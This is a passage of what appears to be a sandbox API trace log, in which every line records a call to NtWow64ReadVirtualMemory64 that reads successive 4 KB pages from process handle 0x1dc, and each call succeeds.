[0077.682] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x26e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x26e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x26e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x26ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.689] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x26eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x26ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x26ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x26ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x26ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x26f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.690] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x26f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x26f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x26f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x26f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x26f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x26f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.691] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x26f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x26f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x26f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x26fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x26fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x26fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x26fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.692] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x26fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x26ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x2700000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x2701000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x2702000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c3000, Buffer=0x7ff8, BufferSize=0x2703000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.693] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x2704000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x2705000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x2706000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x2707000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x2708000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x2709000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x270a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x270b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x270c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x270d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x270e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x270f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x2710000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x2711000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x2712000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x2713000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x2714000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x2715000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x2716000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x2717000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x2718000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x2719000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x271a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x271b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x271c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x271d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x271e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x271f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.697] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.698] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.698] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.698] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.698] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.698] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.699] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.700] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.701] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.702] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.703] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.704] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.705] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) 